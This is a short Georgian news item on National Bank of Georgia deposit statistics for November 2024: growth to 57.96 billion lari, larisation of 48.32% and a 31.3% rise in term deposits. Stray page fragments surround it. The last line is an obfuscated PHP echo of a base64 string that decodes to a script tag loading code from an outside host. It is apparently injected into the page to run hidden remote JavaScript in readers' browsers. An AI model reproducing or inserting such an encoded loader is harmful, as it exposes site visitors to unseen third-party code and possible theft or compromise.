celsiusi
ავერსი jaluzi

ეროვნული ბანკის ინფორმაციით, ნოემბერში დეპოზიტების მოცულობა, წინა თვესთან შედარებით, 439.6 მლნ ლარით გაიზარდა და 57.96 მილიარდი ლარი შეადგინა.

მათივე ცნობით, წინა წლის ანალოგიურ პერიოდთან შედარებით, 14%-ით არის გაზრდილი დეპოზიტების მოცულობა (გაცვლითი კურსის ეფექტის გამორიცხვით).

„აღსანიშნავია, რომ ნოემბერში შინამეურნეობების ლარის დეპოზიტები წლიურად (გაცვლითი კურსის ეფექტის გამორიცხვით) 17%-ით და ხოლო უცხოური ვალუტის დეპოზიტები 12.8%-ით გაიზარდა.

დეპოზიტების ლარიზაციის კოეფიციენტმა 2024 წლის ნოემბრის ბოლოსთვის 48.32% შეადგინა, რაც წინა თვის ბოლო მდგომარეობასთან შედარებით, 0.98 პროცენტული პუნქტით ნაკლებია (გაცვლითი კურსის ეფექტის გამორიცხვით შემცირდა 0-.83 პროცენტული პუნქტით).

აღსანიშნავია ისიც, რომ მზარდია ვადიანი დეპოზიტების მოცულობაც. თუ 2024 წლის ნოემბრის მონაცემებს წინა წლის ანალოგიურ პერიოდს შევადარებთ ვადიანი დეპოზიტების მოცულობა 31.3%-ით გაიზარდა და 26.5 მლრდ ლარი შეადგინა“,- აღნიშნულია ინფორმაციაში.

73
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");